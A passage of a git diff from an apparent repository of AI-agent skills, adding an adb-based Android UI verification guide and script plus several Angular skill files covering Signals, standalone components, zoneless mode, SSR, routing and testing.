### 3. Interaction Commands
- **Tap**: `adb shell input tap <x> <y>` (Use the center of the element bounds).
- **Swipe**: `adb shell input swipe <x1> <y1> <x2> <y2> <duration_ms>` (Used for scrolling).
- **Text Input**: `adb shell input text "<message>"` (Note: Limited support for special characters).
- **Key Events**: `adb shell input keyevent <code_id>` (e.g., 66 for Enter).

### 4. Verification & Reporting
#### Visual Verification
Capture a screenshot after interaction to confirm UI changes.
```bash
adb shell screencap -p /sdcard/screen.png && adb pull /sdcard/screen.png ./artifacts/test_result.png
```

#### Analytical Verification
Monitor the JS console logs in real time to detect errors or log successes.
```bash
adb logcat -d | grep "ReactNativeJS" | tail -n 20
```

#### Cleanup
Always store generated files in the `artifacts/` folder to satisfy project organization rules.

## 💡 Best Practices
- **Wait for Animations**: Always add a short sleep (e.g., 1-2 s) between interaction and verification.
- **Center Taps**: Calculate the arithmetic mean of `[x1,y1][x2,y2]` for the most reliable tap target.
- **Log Markers**: Use distinct log messages in the code (e.g., `✅ Action Successful`) to make `grep` verification easy.
- **Fail Fast**: If a `uiautomator dump` fails or doesn't find the expected text, stop and troubleshoot rather than blind-tapping.
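The center-tap advice above can be sketched as a small helper. `tap_center` is a hypothetical name, and the final `adb` call is left commented out so the arithmetic can be checked off-device:

```shell
#!/bin/sh
# Hypothetical helper: turn a uiautomator bounds string like
# "[100,200][300,400]" into its center point "cx cy".
tap_center() {
  # Normalize "[x1,y1][x2,y2]" to "x1 y1 x2 y2" and split into $1..$4
  set -- $(printf '%s' "$1" | sed -e 's/\]\[/ /' -e 's/[][]//g' -e 's/,/ /g')
  echo "$(( ($1 + $3) / 2 )) $(( ($2 + $4) / 2 ))"
  # On a live emulator, follow with: adb shell input tap <cx> <cy>
}

tap_center "[100,200][300,400]"   # prints "200 300"
```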
@@ -0,0 +1,32 @@
#!/bin/bash

# Helper script for Android UI Verification Skill
# Usage: ./verify_ui.sh [screenshot_name]

ARTIFACTS_DIR="./artifacts"
SCREENSHOT_NAME="${1:-latest_screen}"

echo "🚀 Starting UI Verification..."

# 1. Create artifacts directory if not exists
mkdir -p "$ARTIFACTS_DIR"

# 2. Get Resolution
echo "📏 Calibrating display..."
adb shell wm size

# 3. Dump UI XML
echo "📋 Dumping UI hierarchy..."
adb shell uiautomator dump /sdcard/view.xml
adb pull /sdcard/view.xml "$ARTIFACTS_DIR/view.xml"

# 4. Capture Screenshot
echo "📸 Capturing screenshot: $SCREENSHOT_NAME.png"
adb shell screencap -p /sdcard/screen.png
adb pull /sdcard/screen.png "$ARTIFACTS_DIR/$SCREENSHOT_NAME.png"

# 5. Get Recent JS Logs
echo "📜 Fetching recent JS logs..."
adb logcat -d | grep "ReactNativeJS" | tail -n 20 > "$ARTIFACTS_DIR/js_logs.txt"

echo "✅ Done. Artifacts saved in $ARTIFACTS_DIR"
58 web-app/public/skills/angular-best-practices/README.md Normal file
@@ -0,0 +1,58 @@
# Angular Best Practices

Performance optimization and best practices for Angular applications, optimized for AI agents and LLMs.

## Overview

This skill provides prioritized performance guidelines across:

- **Change Detection** - OnPush strategy, Signals, Zoneless apps
- **Async Operations** - Avoiding waterfalls, SSR preloading
- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
- **Rendering Performance** - TrackBy, virtual scrolling, CDK
- **SSR & Hydration** - Server-side rendering patterns
- **Template Optimization** - Structural directives, pipe memoization
- **State Management** - Efficient reactivity patterns
- **Memory Management** - Subscription cleanup, detached refs

## Structure

The `SKILL.md` file is organized by priority:

1. **Critical Priority** - Largest performance gains (change detection, async)
2. **High Priority** - Significant impact (bundles, rendering)
3. **Medium Priority** - Noticeable improvements (SSR, templates)
4. **Low Priority** - Incremental gains (memory, cleanup)

Each rule includes:

- ❌ **WRONG** - What not to do
- ✅ **CORRECT** - Recommended pattern
- 📝 **Why** - Explanation of the impact

## Quick Reference Checklist

**For New Components:**

- [ ] Using `ChangeDetectionStrategy.OnPush`
- [ ] Using Signals for reactive state
- [ ] Using `@defer` for non-critical content
- [ ] Using `trackBy` for `*ngFor` loops
- [ ] No subscriptions without cleanup

**For Performance Reviews:**

- [ ] No async waterfalls (parallel data fetching)
- [ ] Routes lazy-loaded
- [ ] Large libraries code-split
- [ ] Images use `NgOptimizedImage`

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular Performance](https://angular.dev/guide/performance)
- [Zoneless Angular](https://angular.dev/guide/zoneless)
- [Angular SSR](https://angular.dev/guide/ssr)
@@ -3,6 +3,7 @@ name: angular-best-practices
description: "Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency."
risk: safe
source: self
date_added: "2026-02-27"
---

# Angular Best Practices
13 web-app/public/skills/angular-best-practices/metadata.json Normal file
@@ -0,0 +1,13 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Performance optimization and best practices guide for Angular applications designed for AI agents and LLMs. Covers change detection strategies (OnPush, Signals, Zoneless), avoiding async waterfalls, bundle optimization with lazy loading and @defer, rendering performance, SSR/hydration patterns, and memory management. Prioritized by impact from critical to incremental improvements.",
  "references": [
    "https://angular.dev/best-practices",
    "https://angular.dev/guide/performance",
    "https://angular.dev/guide/zoneless",
    "https://angular.dev/guide/ssr",
    "https://web.dev/performance"
  ]
}
@@ -3,6 +3,7 @@ name: angular-migration
description: "Migrate from AngularJS to Angular using hybrid mode, incremental component rewriting, and dependency injection updates. Use when upgrading AngularJS applications, planning framework migrations, or ..."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Angular Migration
41 web-app/public/skills/angular-state-management/README.md Normal file
@@ -0,0 +1,41 @@
# Angular State Management

Complete state management patterns for Angular applications, optimized for AI agents and LLMs.

## Overview

This skill provides decision frameworks and implementation patterns for:

- **Signal-based Services** - Lightweight state for shared data
- **NgRx SignalStore** - Feature-scoped state with computed values
- **NgRx Store** - Enterprise-scale global state management
- **RxJS ComponentStore** - Reactive component-level state
- **Forms State** - Reactive and template-driven form patterns

## Structure

The `SKILL.md` file is organized into:

1. **State Categories** - Local, shared, global, server, URL, and form state
2. **Selection Criteria** - Decision trees for choosing the right solution
3. **Implementation Patterns** - Complete examples for each approach
4. **Migration Guides** - Moving from BehaviorSubject to Signals
5. **Bridging Patterns** - Integrating Signals with RxJS

## When to Use Each Pattern

- **Signal Service**: Shared UI state (theme, user preferences)
- **NgRx SignalStore**: Feature state with computed values
- **NgRx Store**: Complex cross-feature dependencies
- **ComponentStore**: Component-scoped async operations
- **Reactive Forms**: Form state with validation

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular Signals](https://angular.dev/guide/signals)
- [NgRx](https://ngrx.io)
- [NgRx SignalStore](https://ngrx.io/guide/signals)
@@ -3,6 +3,7 @@ name: angular-state-management
description: "Master modern Angular state management with Signals, NgRx, and RxJS. Use when setting up global state, managing component stores, choosing between state solutions, or migrating from legacy patterns."
risk: safe
source: self
date_added: "2026-02-27"
---

# Angular State Management
13 web-app/public/skills/angular-state-management/metadata.json Normal file
@@ -0,0 +1,13 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Complete state management guide for Angular applications designed for AI agents and LLMs. Covers Signal-based services, NgRx for global state, RxJS patterns, and component stores. Includes decision trees for choosing the right solution, migration patterns from BehaviorSubject to Signals, and strategies for bridging Signals with RxJS observables.",
  "references": [
    "https://angular.dev/guide/signals",
    "https://ngrx.io",
    "https://ngrx.io/guide/signals",
    "https://www.rx-angular.io",
    "https://github.com/ngrx/platform"
  ]
}
55 web-app/public/skills/angular-ui-patterns/README.md Normal file
@@ -0,0 +1,55 @@
# Angular UI Patterns
|
||||
|
||||
Modern UI patterns for building robust Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill covers essential UI patterns for:
|
||||
|
||||
- **Loading States** - Skeleton vs spinner decision trees
|
||||
- **Error Handling** - Error boundary hierarchy and recovery
|
||||
- **Progressive Disclosure** - Using `@defer` for lazy rendering
|
||||
- **Data Display** - Handling empty, loading, and error states
|
||||
- **Form Patterns** - Submission states and validation feedback
|
||||
- **Dialog/Modal Patterns** - Proper dialog lifecycle management
|
||||
|
||||
## Core Principles
|
||||
|
||||
1. **Never show stale UI** - Only show loading when no data exists
|
||||
2. **Surface all errors** - Never silently fail
|
||||
3. **Optimistic updates** - Update UI before server confirms
|
||||
4. **Progressive disclosure** - Use `@defer` to load non-critical content
|
||||
5. **Graceful degradation** - Fallback for failed features
|
||||
|
||||
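The optimistic-update principle can be sketched in plain TypeScript, independent of Angular. This is a minimal illustration, and the `saveItem` callback stands in for a hypothetical server API:

```typescript
// Optimistic update sketch: apply the change locally first, then roll
// back to the previous state if the (hypothetical) server call rejects it.
type Item = { id: number; name: string };

async function optimisticRename(
  items: Item[],
  id: number,
  name: string,
  saveItem: (item: Item) => Promise<void>, // assumed server API
): Promise<Item[]> {
  const previous = items;
  // 1. Update local state immediately (immutably, so change detection sees it).
  const next = items.map((i) => (i.id === id ? { ...i, name } : i));
  try {
    // 2. Confirm with the server.
    await saveItem(next.find((i) => i.id === id)!);
    return next; // server confirmed
  } catch {
    // 3. Roll back on failure — and surface the error, never fail silently.
    return previous;
  }
}
```

In a real component, `previous` and `next` would typically live in a signal, with the rollback paired with an error notification.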
## Structure

The `SKILL.md` file includes:

1. **Golden Rules** - Non-negotiable patterns to follow
2. **Decision Trees** - When to use skeleton vs spinner
3. **Code Examples** - Correct vs incorrect implementations
4. **Anti-patterns** - Common mistakes to avoid

## Quick Reference

```html
<!-- Angular template pattern for data states -->
@if (error()) {
  <app-error-state [error]="error()" (retry)="load()" />
} @else if (loading() && !data()) {
  <app-skeleton-state />
} @else if (!data()?.length) {
  <app-empty-state message="No items found" />
} @else {
  <app-data-display [data]="data()" />
}
```

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular @defer](https://angular.dev/guide/defer)
- [Angular Templates](https://angular.dev/guide/templates)
@@ -3,6 +3,7 @@ name: angular-ui-patterns
description: "Modern Angular UI patterns for loading states, error handling, and data display. Use when building UI components, handling async data, or managing component states."
risk: safe
source: self
date_added: "2026-02-27"
---

# Angular UI Patterns

12 web-app/public/skills/angular-ui-patterns/metadata.json Normal file
@@ -0,0 +1,12 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Modern UI patterns for Angular applications designed for AI agents and LLMs. Covers loading states, error handling, progressive disclosure, and data display patterns. Emphasizes showing loading only without data, surfacing all errors, optimistic updates, and graceful degradation using @defer. Includes decision trees and anti-patterns to avoid.",
  "references": [
    "https://angular.dev/guide/defer",
    "https://angular.dev/guide/templates",
    "https://material.angular.io",
    "https://ng-spartan.com"
  ]
}
40 web-app/public/skills/angular/README.md Normal file
@@ -0,0 +1,40 @@

# Angular

A comprehensive guide to modern Angular development (v20+) optimized for AI agents and LLMs.

## Overview

This skill covers modern Angular patterns including:

- **Signals** - Angular's reactive primitive for state management
- **Standalone Components** - Modern component architecture without NgModules
- **Zoneless Applications** - High-performance apps without Zone.js
- **SSR & Hydration** - Server-side rendering and client hydration patterns
- **Modern Routing** - Functional guards, resolvers, and lazy loading
- **Dependency Injection** - Modern DI with `inject()` function
- **Reactive Forms** - Type-safe form handling

## Structure

This skill is a single, comprehensive `SKILL.md` file containing:

1. Modern component patterns with Signal inputs/outputs
2. State management with Signals and computed values
3. Performance optimization techniques
4. SSR and hydration best practices
5. Migration strategies from legacy Angular patterns

## Usage

This skill is designed to be read in full to understand the complete modern Angular development approach, or referenced for specific patterns when needed.

## Version

Current version: 1.0.0 (February 2026)

## References

- [Angular Documentation](https://angular.dev)
- [Angular Signals](https://angular.dev/guide/signals)
- [Zoneless Angular](https://angular.dev/guide/zoneless)
- [Angular SSR](https://angular.dev/guide/ssr)
818 web-app/public/skills/angular/SKILL.md Normal file
@@ -0,0 +1,818 @@

---
name: angular
description: "Modern Angular (v20+) expert with deep knowledge of Signals, Standalone Components, Zoneless applications, SSR/Hydration, and reactive patterns."
risk: safe
source: self
date_added: '2026-02-27'
---

# Angular Expert

Master modern Angular development with Signals, Standalone Components, Zoneless applications, SSR/Hydration, and the latest reactive patterns.

## When to Use This Skill

- Building new Angular applications (v20+)
- Implementing Signals-based reactive patterns
- Creating Standalone Components and migrating from NgModules
- Configuring Zoneless Angular applications
- Implementing SSR, prerendering, and hydration
- Optimizing Angular performance
- Adopting modern Angular patterns and best practices

## Do Not Use This Skill When

- Migrating from AngularJS (1.x) → use `angular-migration` skill
- Working with legacy Angular apps that cannot upgrade
- General TypeScript issues → use `typescript-expert` skill

## Instructions

1. Assess the Angular version and project structure
2. Apply modern patterns (Signals, Standalone, Zoneless)
3. Implement with proper typing and reactivity
4. Validate with build and tests

## Safety

- Always test changes in development before production
- Gradual migration for existing apps (don't big-bang refactor)
- Keep backward compatibility during transitions

---

## Angular Version Timeline

| Version        | Release | Key Features                                           |
| -------------- | ------- | ------------------------------------------------------ |
| **Angular 20** | Q2 2025 | Signals stable, Zoneless stable, Incremental hydration |
| **Angular 21** | Q4 2025 | Signals-first default, Enhanced SSR                    |
| **Angular 22** | Q2 2026 | Signal Forms, Selectorless components                  |

---

## 1. Signals: The New Reactive Primitive

Signals are Angular's fine-grained reactivity system, replacing zone.js-based change detection.

### Core Concepts

```typescript
import { signal, computed, effect } from "@angular/core";

// Writable signal
const count = signal(0);

// Read value
console.log(count()); // 0

// Update value
count.set(5); // Direct set
count.update((v) => v + 1); // Functional update

// Computed (derived) signal
const doubled = computed(() => count() * 2);

// Effect (side effects) — must run in an injection context,
// e.g. a constructor or field initializer, or be given an Injector
effect(() => {
  console.log(`Count changed to: ${count()}`);
});
```
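The dependency tracking behind `computed()` can be illustrated with a small framework-free sketch. This is a toy model, not Angular's actual implementation; every name here (`activeConsumer`, `invalidate`) is invented for the illustration:

```typescript
// Toy reactivity sketch — NOT Angular's real implementation.
// A signal read during tracking registers the current consumer as a subscriber.
let activeConsumer: (() => void) | null = null;

function signal<T>(initial: T) {
  let value = initial;
  const subs = new Set<() => void>();
  const read = () => {
    if (activeConsumer) subs.add(activeConsumer); // record the dependency
    return value;
  };
  const set = (v: T) => {
    value = v;
    subs.forEach((notify) => notify()); // push invalidation to consumers
  };
  return Object.assign(read, { set, update: (fn: (v: T) => T) => set(fn(value)) });
}

function computed<T>(fn: () => T): () => T {
  let cached!: T;
  let stale = true;
  const invalidate = () => { stale = true; };
  return () => {
    if (stale) {
      const prev = activeConsumer;
      activeConsumer = invalidate; // any signal read inside fn() subscribes us
      cached = fn();
      activeConsumer = prev;
      stale = false;
    }
    return cached;
  };
}

const count = signal(0);
const doubled = computed(() => count() * 2);
console.log(doubled()); // 0
count.set(5);
console.log(doubled()); // 10
```

The real implementation adds equality checks, glitch-free propagation, and cleanup, but the core idea — reads record dependencies, writes invalidate them — is the same.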

### Signal-Based Inputs and Outputs

```typescript
import { Component, input, output, model } from "@angular/core";

@Component({
  selector: "app-user-card",
  standalone: true,
  template: `
    <div class="card">
      <h3>{{ name() }}</h3>
      <span>{{ role() }}</span>
      <button (click)="select.emit(id())">Select</button>
    </div>
  `,
})
export class UserCardComponent {
  // Signal inputs (read-only)
  id = input.required<string>();
  name = input.required<string>();
  role = input<string>("User"); // With default

  // Output
  select = output<string>();

  // Two-way binding (model)
  isSelected = model(false);
}

// Usage:
// <app-user-card [id]="'123'" [name]="'John'" [(isSelected)]="selected" />
```

### Signal Queries (ViewChild/ContentChild)

```typescript
import {
  Component,
  ElementRef,
  viewChild,
  viewChildren,
  contentChild,
} from "@angular/core";

// ItemComponent and HeaderDirective are assumed to be defined elsewhere
@Component({
  selector: "app-container",
  standalone: true,
  imports: [ItemComponent],
  template: `
    <input #searchInput />
    <app-item />
    <app-item />
  `,
})
export class ContainerComponent {
  // Signal-based queries
  searchInput = viewChild<ElementRef>("searchInput");
  items = viewChildren(ItemComponent);
  projectedContent = contentChild(HeaderDirective);

  focusSearch() {
    this.searchInput()?.nativeElement.focus();
  }
}
```

### When to Use Signals vs RxJS

| Use Case                | Signals         | RxJS                             |
| ----------------------- | --------------- | -------------------------------- |
| Local component state   | ✅ Preferred    | Overkill                         |
| Derived/computed values | ✅ `computed()` | `combineLatest` works            |
| Side effects            | ✅ `effect()`   | `tap` operator                   |
| HTTP requests           | ❌              | ✅ HttpClient returns Observable |
| Event streams           | ❌              | ✅ `fromEvent`, operators        |
| Complex async flows     | ❌              | ✅ `switchMap`, `mergeMap`       |

---

## 2. Standalone Components

Standalone components are self-contained and don't require NgModule declarations.

### Creating Standalone Components

```typescript
import { Component } from "@angular/core";
import { CommonModule } from "@angular/common";
import { RouterLink } from "@angular/router";

@Component({
  selector: "app-header",
  standalone: true,
  imports: [CommonModule, RouterLink], // Direct imports
  template: `
    <header>
      <a routerLink="/">Home</a>
      <a routerLink="/about">About</a>
    </header>
  `,
})
export class HeaderComponent {}
```

### Bootstrapping Without NgModule

```typescript
// main.ts
import { bootstrapApplication } from "@angular/platform-browser";
import { provideRouter } from "@angular/router";
import { provideHttpClient } from "@angular/common/http";
import { AppComponent } from "./app/app.component";
import { routes } from "./app/app.routes";

bootstrapApplication(AppComponent, {
  providers: [provideRouter(routes), provideHttpClient()],
});
```

### Lazy Loading Standalone Components

```typescript
// app.routes.ts
import { Routes } from "@angular/router";

export const routes: Routes = [
  {
    path: "dashboard",
    loadComponent: () =>
      import("./dashboard/dashboard.component").then(
        (m) => m.DashboardComponent,
      ),
  },
  {
    path: "admin",
    loadChildren: () =>
      import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
  },
];
```

---

## 3. Zoneless Angular

Zoneless applications don't use zone.js, improving performance and debugging.

### Enabling Zoneless Mode

```typescript
// main.ts
import { bootstrapApplication } from "@angular/platform-browser";
import { provideZonelessChangeDetection } from "@angular/core";
import { AppComponent } from "./app/app.component";

bootstrapApplication(AppComponent, {
  providers: [provideZonelessChangeDetection()],
});
```

### Zoneless Component Patterns

```typescript
import { Component, signal, ChangeDetectionStrategy } from "@angular/core";

@Component({
  selector: "app-counter",
  standalone: true,
  changeDetection: ChangeDetectionStrategy.OnPush,
  template: `
    <div>Count: {{ count() }}</div>
    <button (click)="increment()">+</button>
  `,
})
export class CounterComponent {
  count = signal(0);

  increment() {
    this.count.update((v) => v + 1);
    // No zone.js needed - Signal triggers change detection
  }
}
```

### Key Zoneless Benefits

- **Performance**: No zone.js patches on async APIs
- **Debugging**: Clean stack traces without zone wrappers
- **Bundle size**: Smaller without zone.js (~15KB savings)
- **Interoperability**: Better with Web Components and micro-frontends

---

## 4. Server-Side Rendering & Hydration

### SSR Setup with Angular CLI

```bash
ng add @angular/ssr
```

### Hydration Configuration

```typescript
// app.config.ts
import { ApplicationConfig } from "@angular/core";
import {
  provideClientHydration,
  withEventReplay,
} from "@angular/platform-browser";

export const appConfig: ApplicationConfig = {
  providers: [provideClientHydration(withEventReplay())],
};
```

### Incremental Hydration (v20+)

```typescript
import { Component } from "@angular/core";

@Component({
  selector: "app-page",
  standalone: true,
  template: `
    <app-hero />

    @defer (hydrate on viewport) {
      <app-comments />
    }

    @defer (hydrate on interaction) {
      <app-chat-widget />
    }
  `,
})
export class PageComponent {}
```

### Hydration Triggers

| Trigger          | When to Use                             |
| ---------------- | --------------------------------------- |
| `on idle`        | Low-priority, hydrate when browser idle |
| `on viewport`    | Hydrate when element enters viewport    |
| `on interaction` | Hydrate on first user interaction       |
| `on hover`       | Hydrate when user hovers                |
| `on timer(ms)`   | Hydrate after specified delay           |

---

## 5. Modern Routing Patterns

### Functional Route Guards

```typescript
// auth.guard.ts
import { inject } from "@angular/core";
import { Router, CanActivateFn } from "@angular/router";
import { AuthService } from "./auth.service";

export const authGuard: CanActivateFn = (route, state) => {
  const auth = inject(AuthService);
  const router = inject(Router);

  if (auth.isAuthenticated()) {
    return true;
  }

  return router.createUrlTree(["/login"], {
    queryParams: { returnUrl: state.url },
  });
};

// Usage in routes
export const routes: Routes = [
  {
    path: "dashboard",
    loadComponent: () => import("./dashboard.component"),
    canActivate: [authGuard],
  },
];
```

### Route-Level Data Resolvers

```typescript
import { inject } from '@angular/core';
import { ResolveFn, ActivatedRoute } from '@angular/router';
import { toSignal } from '@angular/core/rxjs-interop';
import { map } from 'rxjs';
import { UserService } from './user.service';
import { User } from './user.model';

export const userResolver: ResolveFn<User> = (route) => {
  const userService = inject(UserService);
  return userService.getUser(route.paramMap.get('id')!);
};

// In routes
{
  path: 'user/:id',
  loadComponent: () => import('./user.component'),
  resolve: { user: userResolver }
}

// In component
export class UserComponent {
  private route = inject(ActivatedRoute);
  user = toSignal(this.route.data.pipe(map(d => d['user'])));
}
```

---

## 6. Dependency Injection Patterns

### Modern inject() Function

```typescript
import { Component, inject } from '@angular/core';
import { toSignal } from '@angular/core/rxjs-interop';
import { HttpClient } from '@angular/common/http';
import { UserService } from './user.service';

@Component({...})
export class UserComponent {
  // Modern inject() - no constructor needed
  private http = inject(HttpClient);
  private userService = inject(UserService);

  // Works in any injection context
  users = toSignal(this.userService.getUsers());
}
```

### Injection Tokens for Configuration

```typescript
import { InjectionToken, Injectable, inject } from "@angular/core";
import { HttpClient } from "@angular/common/http";

// Define token
export const API_BASE_URL = new InjectionToken<string>("API_BASE_URL");

// Provide in config
bootstrapApplication(AppComponent, {
  providers: [{ provide: API_BASE_URL, useValue: "https://api.example.com" }],
});

// Inject in service
@Injectable({ providedIn: "root" })
export class ApiService {
  private http = inject(HttpClient);
  private baseUrl = inject(API_BASE_URL);

  get(endpoint: string) {
    return this.http.get(`${this.baseUrl}/${endpoint}`);
  }
}
```

---

## 7. Component Composition & Reusability

### Content Projection (Slots)

```typescript
@Component({
  selector: 'app-card',
  template: `
    <div class="card">
      <div class="header">
        <!-- Select by attribute -->
        <ng-content select="[card-header]"></ng-content>
      </div>
      <div class="body">
        <!-- Default slot -->
        <ng-content></ng-content>
      </div>
    </div>
  `
})
export class CardComponent {}

// Usage:
// <app-card>
//   <h3 card-header>Title</h3>
//   <p>Body content</p>
// </app-card>
```

### Host Directives (Composition)

```typescript
// Reusable behaviors without inheritance
@Directive({
  standalone: true,
  selector: '[appTooltip]',
  inputs: ['tooltip'] // Declares the 'tooltip' input
})
export class TooltipDirective { ... }

@Component({
  selector: 'app-button',
  standalone: true,
  hostDirectives: [
    {
      directive: TooltipDirective,
      inputs: ['tooltip: title'] // Map input
    }
  ],
  template: `<ng-content />`
})
export class ButtonComponent {}
```

---

## 8. State Management Patterns

### Signal-Based State Service

```typescript
import { Injectable, signal, computed } from "@angular/core";

interface AppState {
  user: User | null;
  theme: "light" | "dark";
  notifications: Notification[];
}

@Injectable({ providedIn: "root" })
export class StateService {
  // Private writable signals
  private _user = signal<User | null>(null);
  private _theme = signal<"light" | "dark">("light");
  private _notifications = signal<Notification[]>([]);

  // Public read-only computed
  readonly user = computed(() => this._user());
  readonly theme = computed(() => this._theme());
  readonly notifications = computed(() => this._notifications());
  readonly unreadCount = computed(
    () => this._notifications().filter((n) => !n.read).length,
  );

  // Actions
  setUser(user: User | null) {
    this._user.set(user);
  }

  toggleTheme() {
    this._theme.update((t) => (t === "light" ? "dark" : "light"));
  }

  addNotification(notification: Notification) {
    this._notifications.update((n) => [...n, notification]);
  }
}
```

### Component Store Pattern with Signals

```typescript
import { Injectable, signal, computed, inject } from "@angular/core";
import { HttpClient } from "@angular/common/http";

@Injectable()
export class ProductStore {
  private http = inject(HttpClient);

  // State
  private _products = signal<Product[]>([]);
  private _loading = signal(false);
  private _filter = signal("");

  // Selectors
  readonly products = computed(() => this._products());
  readonly loading = computed(() => this._loading());
  readonly filteredProducts = computed(() => {
    const filter = this._filter().toLowerCase();
    return this._products().filter((p) =>
      p.name.toLowerCase().includes(filter),
    );
  });

  // Actions
  loadProducts() {
    this._loading.set(true);
    this.http.get<Product[]>("/api/products").subscribe({
      next: (products) => {
        this._products.set(products);
        this._loading.set(false);
      },
      error: () => this._loading.set(false),
    });
  }

  setFilter(filter: string) {
    this._filter.set(filter);
  }
}
```

---

## 9. Forms with Signals (Coming in v22+)

### Current Reactive Forms

```typescript
import { Component, inject } from "@angular/core";
import { FormBuilder, Validators, ReactiveFormsModule } from "@angular/forms";

@Component({
  selector: "app-user-form",
  standalone: true,
  imports: [ReactiveFormsModule],
  template: `
    <form [formGroup]="form" (ngSubmit)="onSubmit()">
      <input formControlName="name" placeholder="Name" />
      <input formControlName="email" type="email" placeholder="Email" />
      <button [disabled]="form.invalid">Submit</button>
    </form>
  `,
})
export class UserFormComponent {
  private fb = inject(FormBuilder);

  form = this.fb.group({
    name: ["", Validators.required],
    email: ["", [Validators.required, Validators.email]],
  });

  onSubmit() {
    if (this.form.valid) {
      console.log(this.form.value);
    }
  }
}
```

### Signal-Aware Form Patterns (Preview)

```typescript
// Future Signal Forms API (experimental)
import { Component, signal, computed } from '@angular/core';

@Component({...})
export class SignalFormComponent {
  name = signal('');
  email = signal('');

  // Computed validation
  isValid = computed(() =>
    this.name().length > 0 &&
    this.email().includes('@')
  );

  submit() {
    if (this.isValid()) {
      console.log({ name: this.name(), email: this.email() });
    }
  }
}
```

---

## 10. Performance Optimization

### Change Detection Strategies

```typescript
@Component({
  changeDetection: ChangeDetectionStrategy.OnPush,
  // Only checks when:
  // 1. Input signal/reference changes
  // 2. Event handler runs
  // 3. Async pipe emits
  // 4. Signal value changes
})
```

### Defer Blocks for Lazy Loading

```typescript
@Component({
  template: `
    <!-- Immediate loading -->
    <app-header />

    <!-- Lazy load when visible -->
    @defer (on viewport) {
      <app-heavy-chart />
    } @placeholder {
      <div class="skeleton" />
    } @loading (minimum 200ms) {
      <app-spinner />
    } @error {
      <p>Failed to load chart</p>
    }
  `
})
```

### NgOptimizedImage

```typescript
import { NgOptimizedImage } from '@angular/common';

@Component({
  imports: [NgOptimizedImage],
  template: `
    <img
      ngSrc="hero.jpg"
      width="800"
      height="600"
      priority
    />

    <img
      ngSrc="thumbnail.jpg"
      width="200"
      height="150"
      loading="lazy"
      placeholder
    />
  `
})
```

---

## 11. Testing Modern Angular

### Testing Signal Components

```typescript
import { ComponentFixture, TestBed } from "@angular/core/testing";
import { CounterComponent } from "./counter.component";

describe("CounterComponent", () => {
  let component: CounterComponent;
  let fixture: ComponentFixture<CounterComponent>;

  beforeEach(async () => {
    await TestBed.configureTestingModule({
      imports: [CounterComponent], // Standalone import
    }).compileComponents();

    fixture = TestBed.createComponent(CounterComponent);
    component = fixture.componentInstance;
    fixture.detectChanges();
  });

  it("should increment count", () => {
    expect(component.count()).toBe(0);

    component.increment();

    expect(component.count()).toBe(1);
  });

  it("should update DOM on signal change", () => {
    component.count.set(5);
    fixture.detectChanges();

    const el = fixture.nativeElement.querySelector("div");
    expect(el.textContent).toContain("5");
  });
});
```

### Testing with Signal Inputs

```typescript
import { ComponentFixture, TestBed } from "@angular/core/testing";
import { ComponentRef } from "@angular/core";
import { UserCardComponent } from "./user-card.component";

describe("UserCardComponent", () => {
  let fixture: ComponentFixture<UserCardComponent>;
  let componentRef: ComponentRef<UserCardComponent>;

  beforeEach(async () => {
    await TestBed.configureTestingModule({
      imports: [UserCardComponent],
    }).compileComponents();

    fixture = TestBed.createComponent(UserCardComponent);
    componentRef = fixture.componentRef;

    // Set signal inputs via setInput
    componentRef.setInput("id", "123");
    componentRef.setInput("name", "John Doe");

    fixture.detectChanges();
  });

  it("should display user name", () => {
    const el = fixture.nativeElement.querySelector("h3");
    expect(el.textContent).toContain("John Doe");
  });
});
```

---

## Best Practices Summary

| Pattern              | ✅ Do                          | ❌ Don't                        |
| -------------------- | ------------------------------ | ------------------------------- |
| **State**            | Use Signals for local state    | Overuse RxJS for simple state   |
| **Components**       | Standalone with direct imports | Bloated SharedModules           |
| **Change Detection** | OnPush + Signals               | Default CD everywhere           |
| **Lazy Loading**     | `@defer` and `loadComponent`   | Eager load everything           |
| **DI**               | `inject()` function            | Constructor injection (verbose) |
| **Inputs**           | `input()` signal function      | `@Input()` decorator (legacy)   |
| **Zoneless**         | Enable for new projects        | Force on legacy without testing |

---

## Resources

- [Angular.dev Documentation](https://angular.dev)
- [Angular Signals Guide](https://angular.dev/guide/signals)
- [Angular SSR Guide](https://angular.dev/guide/ssr)
- [Angular Update Guide](https://angular.dev/update-guide)
- [Angular Blog](https://blog.angular.dev)

---

## Common Troubleshooting

| Issue                          | Solution                                            |
| ------------------------------ | --------------------------------------------------- |
| Signal not updating UI         | Ensure `OnPush` + call signal as function `count()` |
| Hydration mismatch             | Check server/client content consistency             |
| Circular dependency            | Use `inject()` with `forwardRef`                    |
| Zoneless not detecting changes | Trigger via signal updates, not mutations           |
| SSR fetch fails                | Use `TransferState` or `withFetch()`                |
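The "trigger via signal updates, not mutations" row comes down to reference equality: mutating an array or object in place leaves its reference unchanged, so a reference-equality check (the default for signal `.set()` and `OnPush` inputs) sees nothing new. A framework-free sketch of the pitfall:

```typescript
// Signal-style change checks compare references, not contents.
const items: number[] = [1, 2];

// ❌ In-place mutation: same reference, so a reference-equality
// check considers the value "unchanged" and skips the UI update.
const before = items;
items.push(3);
console.log(before === items); // true — change is invisible

// ✅ Immutable update: a new reference, so the change is detected.
const updated = [...items, 4];
console.log(before === updated); // false — change is visible
```

In Angular terms: prefer `list.update((xs) => [...xs, item])` over `list().push(item)`.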
14 web-app/public/skills/angular/metadata.json Normal file
@@ -0,0 +1,14 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Comprehensive guide to modern Angular development (v20+) designed for AI agents and LLMs. Covers Signals, Standalone Components, Zoneless applications, SSR/Hydration, reactive patterns, routing, dependency injection, and modern forms. Emphasizes component-driven architecture with practical examples and migration strategies for modernizing existing codebases.",
